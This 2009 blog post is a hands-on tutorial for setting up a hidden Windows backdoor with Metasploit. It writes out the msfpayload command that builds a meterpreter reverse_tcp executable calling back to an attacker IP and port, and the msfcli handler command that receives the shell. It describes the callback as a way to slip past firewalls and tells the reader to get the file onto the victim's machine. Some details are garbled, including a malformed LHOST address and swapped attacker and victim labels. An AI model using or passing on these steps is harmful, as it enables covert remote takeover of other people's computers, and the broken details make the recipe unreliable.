Tuesday, November 24, 2009

Setting up backdoors using MsfPayload

With Reference to SynJunkies wonderful blog on 'Bob' the backdoor man(can use as a reference also).

Backdoors are pretty cool and leaves one with so many possibilities. In definition, a backdoor is an opening (way to gain access) to a system that his more or less hidden from the sole user(s) of the system. Im gonna show you how easy it is to set up with a few commands. It does involve using Metasploit to generate the payload (our backdoor program) and we are gonna set up a handler (server/listner) to handle to connection. The payload is gonna connect back to us instead of listening and waiting for us to connect to it. The reason for this is because we are anticipating that the system may be using a firewall and 9 times out of 10 would be already blocking the necessary ports for us. We can kung-fu our way through these simple firewalls (like windows firewall) by having our program communicate to us first. Alot of these firewalls would let outside traffic through only if the communication has been originated from within the network.

Noob, 10.0.0.1, Backtrack 4 aka BT4 (linux)
Hacker, 10.0.0.2 (windows 2000, xp SP2, SP3 , Vista etc... it doesnt matter)

Creating the payload with BT4:
"./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 X > backdoor.exe"

Setting up the server/handler to listen for connections on BT4:
"./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.01 LPORT=5555 E"

Now use your magic and get backdoor.exe onto the windows machine or you can just copy it to a usb thumb drive and copy it onto windows, that works. Wtih your server/handler running, execute backdoor.exe on the windows system and voila, your backdoor should now be connected to the server. You now have reasonable control of the windows box. If problems may arise, i would advise turning off your iptables rules or alow port 5555 into your box like i couldnt figure out at the time. Go figure lol.

References/Good Reading:
http://synjunkie.blogspot.com/2009/11/bob-backdoor-man.html
http://synjunkie.blogspot.com/2009/11/bob-backdoor-man-part-2.html

No comments:

Post a Comment